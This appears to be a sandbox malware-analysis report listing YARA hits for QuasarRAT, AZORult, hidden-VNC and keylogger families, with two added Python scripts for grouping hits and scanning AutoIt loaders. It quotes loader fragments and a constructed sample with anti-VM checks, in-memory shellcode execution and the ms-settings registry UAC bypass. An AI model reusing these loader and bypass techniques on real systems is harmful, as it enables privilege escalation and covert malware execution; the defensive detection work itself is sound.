                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE, Matched rule: Azorult Payload, Author: kevoreilly
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Vermin Keylogger, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Patchwork malware, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects malware from disclosed CN malware set, Author: Florian Roth
                      Source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE, Matched rule: Detects QuasarRAT malware, Author: Florian Roth
                      Source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel
                      Source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Detects Quasar RAT, Author: Florian Roth
                      Source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                      Source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects Zloader hidden VNC Author: @VK_Intel
                      Source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORYMatched rule: Detects Zloader hidden VNC Author: @VK_Intel
                      Source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                      Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORYMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects Vermin Keylogger Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects Patchwork malware Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
                      Source: dropped/windef.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Detects Quasar RAT Author: Florian Roth
                      Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPEDMatched rule: Detects QuasarRAT malware Author: Florian Roth
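The match list above is long and mixes three kinds of source (memory dumps, unpacked PE regions and files on disk), so the question an analyst actually wants answered, which analysis process holds which family, is hard to read off it. The following script is an added example, not part of the Joe Sandbox report or of any of the YARA rule authors' tooling: it parses lines in the report's "Source / type / Matched rule / Author" form (and the longer form with rule metadata that appears further down), derives the process number from the source identifier, and groups the hits by process and family. The sample lines are copied from this page; the layout of the source identifiers (process number as the first field, hexadecimal for memory dumps and decimal for unpacked regions) and the keyword-to-family mapping are assumptions read off this page.

```python
"""Group the Joe Sandbox YARA hits above by analysis process.

Added example, not part of the report. SAMPLE_LINES are entries copied from
the match list (one left in the page's run-together form to show the parser
tolerates it). The source-identifier layouts are an assumption read off this
page:
  memory dump  <proc>.<state>.<id>.<base>.<prot>.<type>.sdmp   (proc in hex)
  unpacked PE  <proc>.<state>.<image>.<base>.<n>[.raw].unpack  (proc in decimal)
  file         a path or bare file name, no process number
"""
import re
from collections import defaultdict

SAMPLE_LINES = [
    "Source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Azorult Payload, Author: kevoreilly",
    "Source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY, Matched rule: Detects Quasar RAT, Author: Florian Roth",
    "Source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel",
    "Source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY, Matched rule: Detects Zloader hidden VNC, Author: @VK_Intel",
    "Source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Azorult Payload, Author: kevoreilly",
    "Source: C:\\Users\\user\\AppData\\Roaming\\SubDir\\winsock.exe, type: DROPPED, Matched rule: Detects Quasar RAT, Author: Florian Roth",
    "Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: Detects QuasarRAT malware Author: Florian Roth",
    "Source: CVbJSUXraQ.exe, type: SAMPLE, Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10",
]

# Short form: "... Matched rule: <description> Author: <name>"; the separators
# are optional so the run-together extraction on this page still parses.
SHORT_RE = re.compile(
    r"Source:\s*(?P<src>.+?),\s*type:\s*(?P<type>[A-Z]+)\s*,?\s*"
    r"Matched rule:\s*(?P<rule>.+?)\s*,?\s*Author:\s*(?P<author>.+?)\s*$"
)
# Long form: rule name followed by its metadata; the description field carries
# the same text the short form shows after "Matched rule:".
META_RE = re.compile(
    r"Source:\s*(?P<src>.+?),\s*type:\s*(?P<type>[A-Z]+)\s*,?\s*"
    r"Matched rule:\s*(?P<name>\S+).*?description = (?P<rule>[^,]+)"
)
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.\d+\.[0-9A-Fa-f]{16}\.")
UNPACK_RE = re.compile(r"^(\d+)\.\d+\..+\.unpack$")

# Several authors' rules describe the same family; collapse them by keyword.
FAMILY_KEYWORDS = (
    ("quasar", "QuasarRAT"), ("azorult", "AZORult"),
    ("hidden vnc", "hVNC"), ("vermin", "Vermin"),
)


def family_of(rule: str) -> str:
    low = rule.lower()
    for key, fam in FAMILY_KEYWORDS:
        if key in low:
            return fam
    return "other"  # e.g. the generic Patchwork / CN-set rules


def process_of(src: str):
    """Analysis process number for a memory/unpack id; None for a file on disk."""
    m = SDMP_RE.match(src)
    if m:
        return int(m.group(1), 16)
    m = UNPACK_RE.match(src)
    if m:
        return int(m.group(1))
    return None


def parse_line(line: str):
    m = SHORT_RE.search(line) or META_RE.search(line)
    if not m:
        return None
    rule = m["rule"].strip()
    return {"src": m["src"], "type": m["type"], "rule": rule,
            "family": family_of(rule), "proc": process_of(m["src"])}


def group_by_process(lines):
    """Process number (None = file on disk) -> sorted distinct families."""
    groups = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec:
            groups[rec["proc"]].add(rec["family"])
    return {proc: sorted(fams) for proc, fams in groups.items()}


def multi_family_processes(lines):
    """Processes holding more than one family: hollowing/injection candidates."""
    return sorted(p for p, fams in group_by_process(lines).items()
                  if p is not None and len(fams) > 1)


if __name__ == "__main__":
    for proc, fams in sorted(group_by_process(SAMPLE_LINES).items(),
                             key=lambda kv: (kv[0] is None, kv[0] or 0)):
        print(f"process {proc}: {', '.join(fams)}")
    print("multi-family:", multi_family_processes(SAMPLE_LINES))
```

Run against the full list on this page, the grouping makes the injection chain visible: process 7 (the second CVbJSUXraQ.exe instance) matches Quasar strings at its own image base and the AZORult payload at 0x400000, while processes 4 (vnc.exe) and 5 (svchost.exe) carry only the hidden-VNC module. A process whose memory holds two families is where the "Injects a PE file into a foreign processes" and "Maps a DLL or memory area into another process" signatures in the summary should be checked first.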
Binary is likely a compiled AutoIt script file
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp, String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp, String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, Code function: This is a third-party compiled AutoIt script.
Source: SystemPropertiesPerformance.exe, String found in binary or memory: This is a third-party compiled AutoIt script.
Source: SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp, String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
AutoIt script contains suspicious strings
Source: CVbJSUXraQ.exe, AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: CVbJSUXraQ.exe, AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: CVbJSUXraQ.exe, AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: CVbJSUXraQ.exe, AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: CVbJSUXraQ.exe, AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: CVbJSUXraQ.exe, AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
Source: SystemPropertiesPerformance.exe.1.dr, AutoIt Script: ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = "0" TO
Source: SystemPropertiesPerformance.exe.1.dr, AutoIt Script: ) LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FO
Source: SystemPropertiesPerformance.exe.1.dr, AutoIt Script: 1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837
Source: SystemPropertiesPerformance.exe.1.dr, AutoIt Script: lFree" , "dword" , $LPSHELLCODE , "dword" , "0" , "
Source: SystemPropertiesPerformance.exe.1.dr, AutoIt Script: Call" ) , EXECUTE ("DllCallAddress" ) , EXECUTE ("DllS
Source: SystemPropertiesPerformance.exe.1.dr, AutoIt Script: 89 THEN REGWRITE ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" ,
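The six fragments above describe three distinct behaviours of the AutoIt loader: a check for vmtoolsd.exe and vbox.exe (exit inside a VMware or VirtualBox guest), shellcode accumulated into $BIN_SHELLCODE as a hex string and run through DllCallAddress with the buffer released by VirtualFree afterwards, and a RegWrite to HKCU\Software\Classes\ms-settings\shell\open\command, the ProgID hijack used against auto-elevating Windows binaries such as fodhelper.exe to run a payload at high integrity without a UAC prompt. The script below is an added example, not code from the report or from the sample: it takes decompiled AutoIt source and flags each of those behaviours line by line. The SAMPLE_SCRIPT is a constructed stand-in that mimics the flagged strings (the real decompiled script is not on this page, and the condition in front of the RegWrite is invented); the indicator patterns and the verdict thresholds are the author's assumptions.

```python
"""Flag the behaviours the sandbox pulled out of the decompiled AutoIt script.

Added example, not part of the report. SAMPLE_SCRIPT is a constructed fragment
that mimics the flagged strings (anti-VM process names, shellcode assembled as
a hex string and run through DllCallAddress, and a RegWrite to the ms-settings
ProgID that auto-elevating binaries such as fodhelper.exe resolve). The real
script is not on this page; feed scan_autoit() the decompiler output instead.
"""
import re

# Constructed stand-in for decompiler output; the control flow around the
# flagged strings is invented, only the strings themselves mirror the report.
SAMPLE_SCRIPT = r'''
LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ]
FOR $I = "0" TO UBOUND($ARRAY) - 1
    IF PROCESSEXISTS($ARRAY[$I]) THEN EXIT
NEXT
LOCAL $BIN_SHELLCODE = "0x"
IF $A1 = 63781146 THEN $BIN_SHELLCODE &= "0F848A000000837D0C00"
LOCAL $LPSHELLCODE = DLLCALL("kernel32.dll", "ptr", "VirtualAlloc", "ptr", 0, "ulong_ptr", 4096, "dword", 0x3000, "dword", 64)
EXECUTE("DllCallAddress")
DLLCALL("kernel32.dll", "bool", "VirtualFree", "dword", $LPSHELLCODE, "dword", "0", "dword", 0x8000)
IF @OSBUILD >= 10240 THEN REGWRITE("HKCU\Software\Classes\ms-settings\shell\open\command", "", "REG_SZ", @SCRIPTFULLPATH)
'''

# (indicator name, line-oriented pattern, what a hit means)
INDICATORS = (
    ("anti_vm_process_check",
     re.compile(r'"(vmtoolsd|vbox|vboxservice|vboxtray|vmwaretray)\.exe"', re.I),
     "exits if hypervisor helper processes are running"),
    ("hex_shellcode_blob",
     re.compile(r'\$\w*SHELLCODE\w*\s*&?=\s*"[0-9A-Fa-f]{16,}"'),
     "machine code built up as a hex string"),
    ("in_process_shellcode_exec",
     re.compile(r'DllCallAddress|"VirtualAlloc"|"VirtualProtect"', re.I),
     "allocates an executable buffer and calls into it"),
    ("uac_bypass_ms_settings",
     re.compile(r'HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command', re.I),
     "ProgID hijack used with auto-elevating Windows binaries"),
)


def scan_autoit(source: str) -> dict:
    """Indicator name -> list of source lines that triggered it."""
    findings = {}
    for name, pattern, _ in INDICATORS:
        hits = [ln.strip() for ln in source.splitlines() if pattern.search(ln)]
        if hits:
            findings[name] = hits
    return findings


def verdict(findings: dict) -> str:
    """A shellcode blob plus an execution primitive is conclusive on its own.
    A lone anti-VM check also shows up in legitimate installers, so by itself
    it only raises suspicion."""
    if {"hex_shellcode_blob", "in_process_shellcode_exec"}.issubset(findings):
        return "malicious"
    return "suspicious" if findings else "clean"


def explain(findings: dict) -> list:
    """Human-readable one-liners, in the order INDICATORS are defined."""
    meaning = {name: text for name, _, text in INDICATORS}
    return [f"{name}: {meaning[name]} ({len(findings[name])} line(s))"
            for name, _, _ in INDICATORS if name in findings]


if __name__ == "__main__":
    result = scan_autoit(SAMPLE_SCRIPT)
    for line in explain(result):
        print(line)
    print("verdict:", verdict(result))
```

The patterns are deliberately line-oriented so that each hit can be shown to an analyst with the exact statement that triggered it, which is also how the sandbox presents its evidence above. The ms-settings key is worth a separate detection on the endpoint side: a write to HKCU\Software\Classes\ms-settings\shell\open\command by anything other than an installer is rare enough to alert on directly.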
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DBFCE0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DBE6A0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DBDF00
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DC8808
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DDD975
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DE62D2
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DB1287
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DD1484
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00E37DDB
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DE6DB6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DDBDA6
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DC66E1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe, Code function: 1_2_00DC6F9E
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00AB104C
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00AC50BE
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00AC4C28
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00AC59EA
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00AC5554
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00ADE153
Source: C:\Users\user\AppData\Local\Temp\vnc.exe, Code function: 4_2_00AC5E80
